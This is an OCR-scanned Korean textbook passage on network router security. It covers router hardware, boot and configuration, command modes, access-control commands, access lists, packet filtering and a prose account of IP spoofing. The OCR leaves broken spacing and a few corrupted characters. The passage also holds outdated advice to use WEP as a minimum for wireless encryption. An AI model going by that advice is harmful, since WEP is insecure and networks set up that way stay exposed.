완성된 망보안계 획 에는 망의 물리층에 대 한 고려 사항도 포함되 여 있어 야 한다.물리 
적보안을 위한 공고한 토대를 마련하는데서 망설계를 잘하는것은 근본적의의를 가진다. 
망실 천에서 는 교환집선기 를 리용하고 자료의 경 로들을 구체 적 으로 계 획화함으로써 기 밀 
자료들이 불필요하게 로출되는 일이 없도록 하여야 할것이다. 망관리자는 망케블배선체 
계에 대한 정확한 기록을 보존하고 상시적으로 갱신함으로써 합법적접근을 문서화하며 
모든 이 동과 추가사항들을 반영하도록 하여 야 할것 이 다. 또한 보안향상을 위하여 망과 
케 블에 대 한 감시 를 적 극적 으로 할수 있는 장치 들도 설 치할수 있 다. 뿐만아니 라 망케 블 
에 대한 검열을 정기적으로 진행함으로써 모든 결선상태에 대한 무결성과 합법성을 담보 
하도록 하여 야 한다. 련결점들도 정 기적 으로 반복하여 조사하며 변화된 상태 를 구체적으 
로 조사하여야 한다. 무선 LAN 접속에서는 적어도 WEP 표준에 맞는 암호화수법을 리용하 
여 야 하며 강력한 암호화체 계 도 사용하여 야 한다. 마지 막으로 정 보보안관들은 각 계 층에 
대한 정기적인 보안검열을 진행 하여 내부보안감시사업들을 호상 확인하여야 할것이다. 
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제 7 장. 망경로기의 보안 


스리본 에프 블랜딩 


경로기는 자료통신망동작의 중요한 요소로 된다. 이 장에서는 망경로기의 능력과 망 
을 관리하는데 리용할수 있는 보안특성에 대하여 서술하고 있다. 경로기는 국부망，광지 
역망에서 그리 고 망봉사제공자와 인터 네트에 외부적접속을 하기 위 하여 리용된다. 


경로기의 하드웨어 및 쏘프트웨어 구성요소 


경로기는 그자체가 각이한 능력을 제공하며 대면부와 함께 있음에도 불구하고 하드 
웨어와 쏘프트웨어구성요소의 핵심모임을 포함하고 있다. 핵심하드웨어요소들은 CPU , 
RAM , 비 휘 발성 RAM , ROM , 플래 쉬 기 억 기 그리 고 I / O 포구를 포함하고 있 다. 그림 7 — 1에 
서 이것들에 대하여 륜곽적으로 보여 주었다. 형태에 따라 경로기의 요소들은 각이하게 
설정 될수 있으며 그것들은 장치 의 조화로운 전반동작에 결정 적 인 작용을 하며 경 로기보 
안특성을 지원한다. 



그림 7-1. 경 로기하드웨 어 의 기 본구성 요소들 

• 중앙처리장치 PC 들과 더 큰 콤퓨터체계의 전형적인 중요한 요소로 알려 져 있는 
CPU 는 망경 로기 에서 도 역 시 중요한 요소로 된다. 극소형처 리 장치인 CPU 는 경 
로기 의 처 리 능력 에 직 접 련 관되 여 경 로기 의 조작체 계 를 구성 하는 명 령 들을 수행 
한다. 조종탁이나 텔네트 ( Telnet ) 접속을 통하여 입력된 사용자지령들도 또한 CPU 
에 의하여 처 리된다. 

• 읽기쓰기기억기 RAM 은 경 로기 안에 서 여 러 가지 많은 기 능을 수행 하는데 리 용된 다. 
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RAM 은 또한 파케 트의 완충(장치 가 동작할 때 )，경 로기 설 정 파일 을 위한 기 억 제 공， 
경로조정표의 유지에 리용되며 또한 공통대면부에서 통신흐름의 혼합으로 인하여 
직 접 내 보낼수 없을 때 파케 트대 기렬을 위한 구역제 공에 리 용된다. 동작기 간에 
RAM 은 주소변환규약 ( ARP : Address Resolution Protocol ) 정보를 기억하기 위한 장 
소를 제공하는데 이것은 경로기에 접속된 국부망의 전송능력을 높여 준다. 

• 비휘발성 RAM 경로기의 전원이 꺼질 때 RAM 의 내용은 지워 진다. 경로기의 전 
원 이 꺼 질 때 비 휘 발성 RAM ( NVRAM ) 의 내 용은 유지 된 다. 경 로기 의 설 정 파일 의 
복사본이 NVRAM 에 기억될 때 전원고장으로부터의 회복은 훨씬 빨라 진다. 결 
과 설정파일의 기억을 위하여 개별적인 하드디스크나 플로피장치를 보존할 필요 
는 없어 진다. 마모나 하드구동기 와 같은 구성 요소의 가동은 경 로기하드웨 어 고 
장의 일차적원인이다. 그러므로 이러한 움직이는 구성요소들을 없앨 때 수명은 
훨씬 더 길어 진다. 

• 읽기전용기억 경로기의 체계기판우에 있는 읽기전용기억 ( ROM ) 소자에 들어 있는 
코드는 전원투입 을 진단한다. 이 기 능은 PC 들이 수행하는 전원투입 에 대 한 자체 
검 사와 류사하다. 망경 로기 에 서 OS 쏘프트웨어 는 ROM 에 있는 초기 적재프로그람 
에 의 해서도 적재된다. 쏘프트웨어의 품질은 경 로기의 일부 형 태 에서 ROM 소자 
를 제거 하고 재배 치 하는 방법 으로 갱 신할수 있다. 한편 각이한 기술을 리용하여 
조작체 계 를 기 억 하고 관리할수도 있 다. 

• 플래쉬기억 지울수 있고 프로그람화할수 있는 ROM 의 한 형 태가 플래쉬기억 이 
다. 경로기의 마이크로코드와 OS 이미지는 대다수의 경로기우에 있는 플래쉬기 
억기에 보관될수 있다. 플래쉬기억기의 비용은 전 기간에 소자갱신에서 얻어 
지는 절약비로 쉽게 보상될수 있다. 왜냐하면 그것은 소자의 제거나 교체가 
없이 갱 신될수 있기때 문이 다. 기 억 용량에 따라 여 러개의 OS 이미지를 플래쉬 기 
억장치에 기억시킬수 있다. 경로기의 플래쉬기억기는 OS 를 다른 경로기에 옮 
겨 보관하게 하는 일 반파일 전송규약 (Trival File Transfer Protocol ) 에 도 리용될 수 
있 다. 

• 입/출구 포구 파케트들이 경로기로 들어 오고 나가는 접속부가 I 八)포구이다. 
매체의 특수한 형태에 대한 물리적대면부를 제공하는 매체특정변환기는 매 
I/O 포구에 접속된다. 매체의 형 태 에는 이씨네 트 LAN , 통표고리 LAN , RS -232 
및 V .35 WAN 이 있다. 자료파케 트들이 포구와 변환기 를 거 처서 지 나갈 때 매 
파케트는 CPU 에 의하여 처리되여 경로조정표에 따라 파케트를 어디로 보낼 
것 인가를 결정하여 야 한다. 이 처 리를 처 리교환방식 이 라고 한다. LAN 으로부 
터 자료가 접수됨에 따라 파케트가 RAM 에로 이동될 때 두번째 층의 머 리부 
들은 제 거된다. 파케 트의 출구포구와 교갑화하는 수법 은 이 과정 에 의하여 결 
정된 다. 

처 리교환방식 의 변종을 고속교환이 라고 부론다. 여 기 에서 경 로기 는 목적지 IP 주소와 
다음 마디 점대 면부에 대 한 정 보를 담고 있는 완충기억 을 관리한다. 고속교환에 서 경 로기 
는 경 로표에서 이미 얻은 정 보를 보관하여 완충기를 설정한다. 이 도식 에서 특수한 목적 
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주소로 가는 첫번째 파케 트는 CPU 로 하여 금 경 로표를 참고하게 한다. 개 별목적 지 주소를 
위 한 next-hop 대면부에 관한 정보가 얻 어 지고 그 고속교환완충기 에 기 억된후에는 이 목 
적 지주소에 보낼 새 파케 트를 이 경 로표에 서 더 는 찾아 보지 않는다. 결과 경 로기 CPU 
에 대한 부하가 실질적으로 감소되며 교환파케트에 대한 경로기수용능력은 훨씬 더 빠른 
속도로 생기게 된다. 일부 형태의 보다 높은 성능의 종단경로기모형은 고속교환의 발전 
된 변종을 고려한 특수한 하드웨 어의 특성 이 다. 경 로기의 형태 에 상관없이 완충기는 대 
면부접 합의 목적주소를 획 득하고 기 억하는데 리 용된 다. 일 부 발전된 특징 을 가진 경 로기 
도 원천 IP 주소와 웃층의 TCP 포구를 얻는다. 이러한 형태의 교환방식을 망흐름교환이라고 
한다. 


경로기의 초기화 

경 로기 는 장치 에 전원 이 투입 될 때 미 리 정 해 진 일 련의 조작들을 수행한다. 경 로기 
의 사전설정에 따라 추가적인 조작들이 수행될수 있다. 이 조작들은 경로기의 안정성에 
이 바지하며 그의 적 절 하고 안전한 기 능수행 에 필 요한것 이 다. 

경 로기 가 수행하는 첫번째 기 능은 전원투입 검 사 또는 POST 라고 하는 여 러 공정 의 
진단검사들이 다. 이 검사들은 경로기의 처 리 장치，기 억장치 및 대면부회 로의 동작을 확인 
하기 위한것 이 다. 전원 이 투입 된 상태 에 서 수행 되 는 기 본기 능들과 함께 이 기 능도 그림 
7 -2 에 제시되였다. 

흐름도에 따르면 POST 과정 이 완료되 자마자 초기 적 재프로그람은 조작체 계 OS 를 주 
기억에로 초기화한다. 이 과정의 첫 단계는 경로기설정등록기를 검사하여 OS 이미지위치 
를 결정하는것이다. 이미지는 ROM, 플래쉬기억 혹은 망에 있을수도 있다. 등록기설정은 
OS 의 위 치를 가리킬뿐아니 라 조종탁말단이 진단통보문을 연시하는가 그리 고 경 로기 가 
조정판건반우에 있는 중지건의 입구에 어 떻게 반응하는가 하는것들을 포함하여 다른 건 
기 능들을 정 의 하기 도 한다. 설 정 등록기 는 초기 적 재마당을 가리키 는 마지 막 4bit 를 합하여 
16bit 값이다. 경로기의 설정파일의 위치는 초기적재마당에 의하여 식별된다. 초기적재등 
록기가 가장 일반적인 설정인 2로 설정되는 경우에 경로기는 초기적재지령에 관한 설정 
파일을 람색하게 될것 이 다. 이 설정 이 발견되지 않는 경우에 경 로기는 플래쉬기억기로부 
터 OS 이미지를 적재하게 된다. OS 이미지가 플래쉬기억기에 없으면 경로기는 OS 이미지 
가 요청하는 TFTP 를 방송주소에 로 내 보내 게 된다. 그러 면 이 미지는 TFTP 봉사기 로부터 
적재될것이다. 

일 단 등록기설정과정 이 완결되 면 초기적재프로그람은 경 로기 ROM 에 이미지를 적재 
한다. OS 이미지 가 지 금 적재된 상태 에서 이 전의 설정파일 이 보관되 여 있는가 하는것을 
결정 하기 위하여 초기 적재프로그람으로 시 험한다. 그다음 이 파일 이 ROM 에 적재 되 여 실 
행된다. 이때 경로기는 동작할수도 있게 된다. 만일 이 파일이 NVRAM 에 기억되지 않으 
면 설정대 화는 OS 에 의하여 실행 된다. 이 설정 대 화는 조종탁조작자에 게 제 기된 미 리 규 
정 된 질문의 순서렬인바 이 질문순서렬은 설정정 보구축을 위하여 완성 되 여 야 한다. 그 
다음 설정정보는 NVRAM 에 기억된다. 
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련 이 어 일 어 나는 초기 화과정 에 이 설정파일 판은 NVRAM 으로부터 복사될것 이 며 
RAM 에 적 재 될 것 이 다. 경 로기 의 통과암호회 복기 간에 설 정파일 의 내 용을 우회하기 위하여 
설정등록기는 NVRAM 내용을 무시하라는 지령을 받을수 있다. 

조작체계이미지 

이 미 언급한바와 같이 초기 적 재 프로그람은 설정등록기 의 설정 에 기 초하여 OS 이 미 지 
를 찾아 본다. OS 이미지는 다음과 갈은 기능을 수행하는 여 러 루린들로 구성되 여 있다. 

• 사용자지령수행 

• 각이한망기능지원 

• 경 로조정 표갱 신 

• 완충기공간관리를 포함하여 경로기를 통하여 자료전송을 지원하기 
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이 OS 이미지는 기억기의 낮은 주소공간에 기억된다. 

설정과일 

설정파일의 역할은 경로기초기화과정에서 간단히 론의되였다. 경로기관리자는 이 파 
일을 설정하는데 대하여 책임이 있으며 이 파일은 OS 에 의하여 해석되는 정보를 포함하 
고 있다. 설정파일은 OS 안에 구축된 각이한 기능수행을 책임진 관건적 인 쏘프트웨 어구 성 
요소이 다. 가장 중요한 기 능의 하나는 접근목록표에 대 한 정의 와 그것 들이 OS 에 의하여 
각이한 대면부에 어떻게 정의되는가에 대한 정의이다. 이것은 경로기를 통과하여 파케트 
흐름에 영 향을 주는 조종의 정 도를 확립하는 중요한 보안통제 기 능이 다. 다시 말하여 OS 
는 보안통제를 확립하는 설정파일에 기억되여 있는 접근조종목록명령문들을 해석하고 수 
행한다. 설정파일은 조종탁조작자가 그것을 보관할 때 NVRAM 기 억기의 높은 주소공간에 
기억된다. OS 는 그다음 그것에 접근하여 NVRAM 의 보다 낮은 기억주소공간에 기억된다. 

경로기의 자료흐■조종 


경 로기 가 자료흐름을 어떻 게 조종하는가를 리해하는것은 이 망장치의 전면적 인 작용 
에 대 한 관건적 인 문제 로 된다. 설정파일 에 기 억된 정 보는 경 로기를 거 쳐 자료가 어 떻게 
흘러 갈것 인 가를 결 정한다. 

우선 처 리되 여 야 할 프레 임의 형 태는 매체대면부(이씨네 트，통표고리 ， FDDI 등)에서 
이전에 입력된 설정지령에 의하여 결정된다. 이 지령볼은 하나 혹은 그이상의 조작속도 
와 대 면부를 완전히 규정하는 기 타 파라메터 들로 설정 되 여 있 다. 경 로기 는 도착하는 자 
료의 프레 임형식을 검증하고 지원해 야 할 대면부의 형태를 인식한후에 출구용프레 임을 
전개한다. 출구용프레 임 들은 그 대 면부를 통하여 혹은 다른 대 면부를 통하여 형 성할수 
있 다. 경 로기 가 제 공하는 중요한 조종특성 은 정 확한 순환여유검 사 ( CRC ) 를 리용하는 능력 
이다. CRC 의 특성은 대면부가 경로기에 알려 져 있기때문에 수신된 프레임우에서 자료 
의 무결성 을 검사하는것 이 다. 또한 정 확한 CRC 가 계산되 고 경 로기 에 의하여 매체 에 배 
렬된 프레임에 덧붙여 진다. 

경 로조정표입 력 자료들을 나타내 는 방법 은 NVRAM 에 있는 설정지 령 들에 의하여 조 
종된다. 이 입 력 자료들은 정적경 로조정，자료흐름우선권경 로조정，주소결합 그리 고 파케 
트목적주소대 면부의 경 로조정 등을 포함한다. 정적경 로조정 이 이 루어 질 때 그 경 로기는 
다른 경 로기 와 경 로조정표입 력 자료들을 교환하지 못한다. 우선권경 로조정 에 의하여 하나 
혹은 그이상의 우선권대 기렬로 자료가 흐를수 있는데 거 기서 높은 우선권을 가진 파케 트 
는 우선권이 낮은 파케트를 앞서 지나간다. IP 주소와 그에 대응하는 MAC 주소사이의 결 
합을 기억하는 기억기의 범위는 ARP 완충기에 의하여 표시된다. 파케트의 경로로 될 목 
적주소대 면부도 역 시 경 로조정표의 입 력 자료들에 의하여 정 의 된다. 

자료가 경 로기 안으로 지 나갈 때 여 러 가지 결심 채 택조작과정 이 발생한다. 례 를 들어 
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자료파케트의 목적주소가 LAN 이고 그리고 주소결정 이 요구되면 경로기는 ARP 완충기를 
리용하여 MAC 전송주소와 나가는 프레 임 의 목적 지 를 결 정하게 될 것 이 다. 만일 캐 쉬 에 정 
확한 주소가 없으면 경 로기는 필요한 MAC 주소를 결정 하기 위하여 ARP 파케 트를 형성하 
고 내보내게 된다. 일단 목적지주소와 교갑화방법이 결정되면 파케트는 밖으로 나가는 
대면부포구로 송달될수 있게 준비된다. 우선권규정에 따라 파케트는 송신완충기안으로 
전송되 기 에 앞서 우선권대 기렬안에 놓일 수 있 다. 

경로기설정 


경 로기와 결합된 보안관리범위를 론의하기 에 앞서 먼저 경 로기설정과정 을 리해하여 
야 한다. 이 과정은 기본설정 고찰에 대 한 리해，지 령해석기，사용자조작방식，특권조작방 
식 및 설정지 령의 여 러 가지 형 태들에 대 한 본질적 인 리해를 가져 야 한다. 다음으로 접근 
보안목록과 보안관리 의 암호조종기능을 서 술한다. 

경로기설정설비 

경 로기설정설비를 리용하여 경 로기 에 이름을 할당하고 직 접접속과 가상말단통과암호 
를 할당한다. 일단 설정이 끝나면 조작자는 설정을 접수하라는 재촉을 받게 된다. 설치설 
정처리기간에 조작자는 매 규약과 대면부에 관한 여러가지 특정한 파라메터를 입구할수 
있게끔 준비되여야 한다. 준비중에 조작자는 설치된 대면부의 형태와 리용할수 있는 목 
록에 정통하여 야 한다. 

경로기설치지 령들은 미 리 확립된 설정입 력 자료들을 조사하는데 리용될뿐아니 라 허용 
되 는 통과암호를 변경 시 키 는데 도 리 용된다. 조작자는 경 로기 조종탁포구에 허 용되 는 지 령 
을 입력하여 통과암호를 규정하여야 한다. 이 지령은 경로기의 동작환경을 변경시키는 
특정한 수행지 령 들에 접 근할수 있게 한다. 또한 허 용되 는 안전통과암호라고 하는 다른 
통과암호는 접 근보안을 제 공하는데 리용될 수 있 다. 이 통과암호는 허 용되 는 통과암호와 
같은 목적 으로 쓰이 지 만 허 용되 는 안전통과암호는 설 정파일 에 서 암호화된 다. 결 과 설정 이 
조종탁우에 연시될 때 허용되는 안전통과암호의 암호화된 판본 ( version ) 만이 사용될수 있다. 
따라서 허용되는 안전통과암호는 경로기설정이 이미지를 얻는다고 하여 로출되지는 않는 
다. 허 용되 는 통과암호(또한 가상말단，보조품 그리 고 조종탁포구)를 암호화하기 위하여 서 
는 봉사통과암호의 암호화지 령 을 리용할수 있 다. 이 암호화기 술은 그닥 위 력한것 은 아니 
며 공통적 으로 쓸수 있 는 통과암호해 독쏘 프트웨 어 를 통하여 쉽 게 절 충될 수 있 다. 그러 므 
로 허 용되 는 통과암호는 설정파일 에 충분한 보안을 제 공하는데 리용되 여 야 한다. 

지령해석기 

경 로기는 지 령해석기를 리용하여 조작자가 입 구하는 경 로기지 령들을 해석한다. 해석 
기는 지 령부분을 검사하고 요구되는 조작을 수행한다. 지 령해석기 에 로의 접근을 위하여 
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조작자는 정확한 통과암호에 의하여 경로기에 접속되여야 한다. 이것은 설치과정에 이루 
어 지게 된다. 조작자는 두개의 서로 분리된 지령해석기수준이나 접근수준을 리용할수 
있다. 이것은 사용자지령과 특권지령을 의미하는데 그 매개는 서로 다른 통과암호로 설 
정되여 장비된다. 

• 사용자조작방식 사용자조작방식은 오직 경로기에 접속될 때만 엄어 진다. 이 접 
근수준은 조작자로 하여금 개방접속의 연시，말단파라메터의 변경，론리적접속의 
이름설정 그리고 다른 호스트에 접속하기와 같은 기능을 수행할수 있게 한다. 
이것들은 모두 중요하지 않은 기능들로 간주된다. 

• 특권조작방식 특권지령들은 예민하고 중요한 조작들을 수행하는데 쓰인다. 례를 
들면 특권지령해석기는 조작자로 하여금 말단잠그기，특권명령의 인입과 차단， 
설정정보입력을 수행할수 있게 한다. 표 7_1은 일부 특권방식지령들의 한개 목 
륵을 보여 주고 있다. 사용자방식에 쓰일수 있는 모든 지령들은 또한 특권방식 
에도 쓰일수 있다. 

사용자방식의 명령들은 그 목록에 포함되지 않았다. 

표 7-1 특권방식의 지령들 


지 폭 

기 능 

Clear 

기 능들을 다시 설 정한다. 

Configure 

설정방식 을 입 력한다. 

Conect 

열린말단을 접 속한다. 

Disable 

특권명 령을 무효화한다. 

Erase 

플래쉬기 억이나 설정기억을 소거 한다. 

Lock 

말단을 잠근다. 

Reload 

끄고 다시 시 동하는것 을 수행한다. 

Setup 

설정지 령설비를 가동시 킨다. 

Telnet 

Telnet 대화를 개방한다. 

Tunnel 

런넬접속을 개방한다. 

Write 

가동하는 설정을 기억기에 쓴다. 


특권방식조작은 경로기를 설정하는데 리용된다. 이 방식에 처음으로 들어 갈 때에는 
통과암호가 요구되지 않는다. 허용되는 통과암호지령은 특권방식에 련이어 계속되는 접 
근을 위한 통과암호를 할당하는데 리 용될 것 이 다. 
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설정지령들 

설정지령들은 경로기를 설정하는데 리용된다. 이 지령들은 네 부류로 나누어 진다. 
즉 전체적인것，대면부，회선 및 경로기부분지령들로 분류된다. 표 7 — 2는 경로기설정지 
령목록을 보여 주고 있 다. 


표 7-2 

경로기설정지령들 

지 령 

리 용 

Write terminal 

Write network 

Write erase 

Configure network 

Configure memory 

Configure terminal 

RAM 에 있는 현재 의 설정 정 보를 연시한다. 

RAM 의 현재설정정보를 TFTP 를 거쳐 망봉사기와 공유시킨다. 

NVRAM 의 내 용을 소거한다. 

망봉사기 로 이 전에 창조된 설정정 보를 적재한다. 

NVRAM 으로 이 전에 창조된 설정정 보를 적재한다. 

조종락으로써 수동으로 경 로기 를 설정한다. 

전체적인 설정지령들은 체계전체의 파라메터를 규정하며 접근표들을 포함하게 한다. 
대 면부지 령 들은 LAN 혹은 WAN 대 면부의 특성 을 규정하며 한개 대 면부명 령 이 그다음에 
놓인다. 이 지 령들은 망을 개별적포구에 할당하고 대면부에 요구되는 특수한 파라메터들 
을 설 정 하는데 리 용된 다. 회 선 지 령 들은 직 렬 말단회 선 연산을 변 경 하는데 리 용된 다. 끝으로 
경 로기 부분지 령 들은 IP 규약파라메 터 들을 설 정 하는데 리 용되 며 경 로기 지 령 이 리 용된 다음 
에 쓰인다. 

경로기접근조종 


이 미 언급한바와 같이 경 로기 와 특권지 령리용에 대 한 접 근조종은 통과암호의 리용을 
통하여 확립된다. 이 지령들은 표 7 — 3에 제시되여 있다. 

표 7-3 

경로기접근조종지령들 

지 령 

기 능 

Enable password 

특권 EXE 방식접 근은 이 통과암호에 의하여 설정 된다. 

Enable secret 

MD5 암호화를 리용한 허용되는 안전한 접근은 통과암호에 의하여 

설정된다. 

Line console 0 

회선조종락의 접근은 이 통과암호에 의하여 설정된다. 

Line vty04 

텔 네 트접 속접 근은 이 통과암호에 의하여 설정 된다. 

Sercvice password encryption 

연시지 령 을 리용할 때 이 지 령은 그 통과암호연시 를 보호한다. 
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경로기접근목록 


경 로기 접 근목록의 리 용은 접 근보안조종의 행 정 관리 에 서 관건적 역 할을 한다. 경 로기 의 
가장 중요한 보안특징의 하나는 망안에서 자료파케트흐름을 조종하는 능력 이 다. 이 특징을 
파케트의 려과라고 하는데 이것은 원천 및 목적지 IP 주소 그리고 리용되는 응용의 형태에 
기초하여 망에서 자료흐름의 조종을 고려한다. 이 려과는 접근표를 리용하여 수행된다. 

파케트에 들어 있는 정합기준에 기초하여 경로기를 거쳐 자료파케트가 흐르는것을 
허 용하거 나 거 절하는 명 령 문의 순서 목록은 접 근목록으로 정 의된다. 접 근목록에 는 두가지 
중요한 측면이 있다. 즉 한 측면은 접근목록명령문의 순서렬이나 차례이고 다른 측면은 
접근표의 마지막에 하나의 절대적인 부정명령문을 리용하는것이다. 려과가 정확하게 되 
도록 하기 위하여 명령문은 접근표의 정확한 순서로 입력되여야 한다. 또한 명시적인 허 
가명령문들을 리용하여 자료가 암시적인 거절명령문에 의하여 기각되지 않도록 해야 한 
다. 명백히 허가되지 않은 파케트는 접근목록의 끝에 있는 무조건 《모두 거부》명령문 
에 의하여 기각될것이다. 

경로기들은 프로그람화되여 파케트려과를 수행함으로써 각이한 종류의 많은 보안문 
제들을 처리할수 있다. 례하면 파케트려과를 리용하여 특수한 주소명령으로부터 시작되 
는 망작업 에 텔네트대화파케트가 들어 가지 못하도록 할수 있다. 파케트들을 허용하는데 
리용하는가 아니 면 거 부하는데 리용하는가 하는 기 준은 파케 트의 3층이 나 4층머 리 부에 
들어 있는 정 보에 좌우된다. 접 근목록들이 파케 트들을 려 과하기 위하여 4층이 상에 있는 
정 보를 리 용할수 없으므로 문맥 에 기 초한 접 근조종 ( CBAC ) 이 리용될수 있는바 CBAC 는 
응용층에 서 의 려 과가능성 을 제 공한다. 

관리령역 

관리령역은 워크스테 이션，봉사기，망련결 및 단일한 관리집 단에 의하여 유지되는 경 
토기 와 갈은 망장치 들의 일 반적 부류의 하나이 다. 경 로기 는 관리령역 들사이 의 경 계 로서 
리용된다. 매개 관리령역은 자기자체의 안전방책을 가지고 있다. 결과 개별적인 령역은 
자료망들사이 에 제 한된 접 근을 가지 고 있 다. 대 다수의 기 관들에 는 한개 관리령역 만이 필 
요될것 이지 만 만일 서 로 다른 보안방책 이 요구된다면 개 별적 인 령역 들이 창조될수 있다. 

경로기들은 령역들사이의 경계로 리용되지만 또한 행정관리령역들을 접속하는데 도 
리 용된다. 경 로기 들은 회 사망들의 두개 혹은 그이 상의 행 정 관리령역 들을 련결 하는데 리 
용될수 있거 나 회 사의 행 정 관리령역 들을 인터네 트에 련결 하는데 리 용할수 있 다. 모든 자 
료파케 트들이 경 로기를 통하여 흘러 야 하며 경 로기 들이 지 리적 으로 분산된 싸이트들을 
련결 하는데 리용되 여 야 하기 때 문에 추가적 인 설비 나 쏘프트웨 어 를 요구할 필요는 없고 
경 로기 가 파케트러 과기 능을 제 공하기만 하면 된 다. 정 교하고 복잡한 보안을 하는 정 확한 
보안방책 을 수행 하기 위한 모든 기 능을 망경 로기 가 제 공할수 있 다. 

보안방책과 기타 경로기기 능을 창조하기 위 하여 씨스코회사 ( Cisco ) 가 리 용하는 조작체 
계 를 망결 합조작체 계 ( IOS : Internetwork Operating System ) 라고 한다. 조종탁조작자에 의 하여 
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입구된 명 령들은 IOS 와 대면부로 접속한다. IOS 는 이 명 령들을 리용하여 경로기설정을 관 
리하고 기억기 및 대면부와 같은 체계하드웨어를 조종하며 그리고 파케트들의 이동과 경 
로조정 및 ARP 표와 갈은 동적정보를 구성하는것 등의 체 계과제들을 수행한다. 이외 에 IOS 
는 Windows , Linux 및 Unix 등 기 타 조작체 계 들에서 볼수 있는 많은 특징 을 가진다. 

접근목록들은 또한 파케트려과와는 다른 기능들을 제공한다. 이 기능들에는 경로기 
접 근조종，경 로기 려 과작용갱 신，파케 트대 기렬 및 수요에 의한 다이 얼 조종이 있 다. 접 근목 
륵들은 SNMP 및 Telnet 와 같은 기구를 통하여 경로기에로의 접근을 조종하는데 리용된 
다. 또한 접 근목록들을 리용하여 망이 경 로기 려 과갱 신을 통하여 경 로조정 규약이 라고 알 
려 지 지 못하게 할수 있 다. 파케 트의 어 떤 부류들은 접 근목록들을 리용함으로써 다른 파 
케 트부류들에 대 한 우선권을 부여 받아 밖으로 나가는 각이한 대 기렬들에 이 파케 트형 식 
들을 지 정할수 있 다. 마지 막으로 접 근목록들을 리용하여 다이 얼 접 속기 능을 리용하도록 
파케 트들을 정 의 함으로써 이 기 능을 시 동시 킬 수 있 다. 


과케트려과 


앞에 서 설명한바와 같이 접 근목록의 기 본기 능은 파케 트를 려 과하는것 이 다. 려 과는 
망의 안전을 보장하는데서 하나의 중요한 기능이 다. 여 러가지 장치를 리용하여 파케트를 
려 과할수 있다. 파케 트려 과는 또한 방화벽내 부의 하나의 공통적 인 특징 인데 방화벽안에 
는 망보안이 구축되여 내부의 신뢰성 있는 체계들과 외부의 신뢰성 없는 체계들사이의 
접근을 조종한다. 어느 파케트가 경로기의 통과를 허용 받으며 어느 파케트가 경로기의 
통과를 거 부 당하는가 하는것 을 파케 트내 부에 담겨 진 정 보에 기 초하여 결 정하는것 을 바 
로 파케 트려과도구라고 한다. 

관리 자들은 파케 트러 과도구를 리용하여 경 로기 를 통과하기 위하여 파케 트가 준수해 
야 할 일정한 기 준들을 정 해 놓는다. 지정된 해 당 기 준항목에 맞지 않으면 파케트는 통 
과를 거절당한다. 파케트가 거절도 되지 않고 허용도 되지 않는다면 그 파케트는 기존값 
에 의하여 거절된다. 이것 을 암시 적거절 이라고 하며 오늘 산업 에서 사용되 는 공통적이며 
중요한 보안특성의 하나로 된다. 언급된것처럼 암시적거절은 기존값으로 동작하지만 명 
시적허용에 의하여 무시될수도 있다. 파케트려과를 통한 다른 보안특성들은 제한성을 가 
지 게 된다. 이 제 한성 들에 는 무상태 파케 트검 사，정 보검 열제 한성 들, IP 주소위 장 등이 있 다. 

무상태과케트검사 

접 근조종목록이 어 떤 파케 트가 TCP / UDP 대 화의 일 부분인가를 결정하지 못할수도 있 
는데 그 원인은 매 파케트가 마치도 단독적인 실체인것처럼 되여 검사 받기때문이다. 
ACK 비 트가 설정 된 내 향성 TCP 파케 트가 실지 현존대 화의 일부분인가를 결정하는 방도는 
아직 없다. 이것 을 무상태 파케트러과(례하면 경 로기 가 현존대 화의 상태 나 지위 에 대 한 
정 보를 가지 고 있지 못한다.)라고 부론다. 무상태파케 트검 사는 비 문맥성접 근조종목록에 
의하여 수행 된 다. 

상태표들을 리용하여 원천지주소，목적 지 주소，경 로기 와 자료들을 교환하는 포구들을 
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기록할수 있다. 들어 오는 파케트들이 검사를 받아 현재 진행중에 있는 대화의 부분인가 
를 확인 받지만 전통적인 접근목록은 어떤 파케트가 현존상위층대화의 부분인가 아닌가 
를 판별하는 능력은 못 가지고 있다. 접근목록을 리용하면 개별적인 파케트들을 검사하여 
그것이 현존대화의 부분인가를 결정할수도 있겠지만 설정된 열쇠단어를 사용하는것이 기 
본이 여야만 가능하다. 그러 나 이 검 사는 TCP 대 화에만 한정 되 여 있는데 그 원 인은 UDP 
가 비접 속형 규약이 며 현 접 속상태 를 보여 주는 기 발이 규약의 머 리 부분에 전혀 없기 때 문 
이 다. 또한 TCP 대 화에 서 는 이 조종이 위 장수법 에 의하여 쉽 게 손상될 수 있 다. 

정보검사한계 

전통적인 접근목록들은 IP 계층이상의 파케트정보를 검사할 때에는 검사능력이 제한 
되 여 있고 제4계 층이 상의 정 보를 검 사하지 못하며 또한 안전하게 처 리하는 능력 이 없다. 
확장접 근목록은 제 4계 층의 머 리 부정보를 제 한된 량만 검 사할수 있 다. 그러 나 보다 최 근 
의 접근목록기술에서는 일련의 갱신이 있다. 이에 대해서는 이 장에서 후에 보기로 하자. 

IP 주소우 I 장하기 

IP 주소위 장하기 는 콤퓨터해 커 들이 망체 계 를 교란시 킬 때 흔히 쓰는 망공격 기 술이 다. 
주소려과를 하여 IP 주소위장하기를 없애려 하지만 이 주소위장하기는 남의 망주소를 자 
기망주소처럼 가장하여 자기가 보낸 파케트가 마치도 신뢰도가 있는 남의 콤퓨터가 보낸 
것처럼 위장한다. 주소위장을 하기 위하여 위장자는 초기 TCP 3회주고받기 ( three-way 
handshake ) 를 하는 동안에 자기의 PC 로부터의 SYN 요청에 대한 대 답으로 보내 온 초기 순 
서 번 호로 추측하여 야 한다. 도착지 PC 는 SYN 요청 을 받자마자 SYN-ACK 응답을 위 장에 
리 용된 IP 주소의 합법 적 소유자에 게 보내온다. 결국 위 장자는 응답을 절대 로 받지 못하게 
되 여 있 다. 따라서 위 장자는 SYN-ACK 파케 트에 담겨 진 초기렬 수자를 추측하여 공격 자 
의 PC 가 보낸 ACK 에 정 확한 정 보가 담겨 주고받기과정 이 완결되 게 해 야 한다. 바로 이 
점에서 해커 즉 위장자는 성공적으로 망에 들어 간다. 

공격자 즉 해커들이 그 누구에게 피해를 주는것이 목적이라면 망에 들어 갈 필요가 
없다. 실례로 공격자가 나쁜 파케트를 어느 호스트체계에 보내여 그 호스트의 기능을 마 
비시키려 한다고 하자. 이런 형태의 공격을 흔히 봉사거부공격이라고 한다. 공격자는 단 
지 그 대상의 주소만 위장하면 되지 결코 그 대상과의 련결을 지을 필요는 없다. 

표준접근목록 

표준접 근목록은 원천지 IP 주소에 만 의 거하기때 문에 기 능상 매 우 제 한되 여 있 다. 표준 
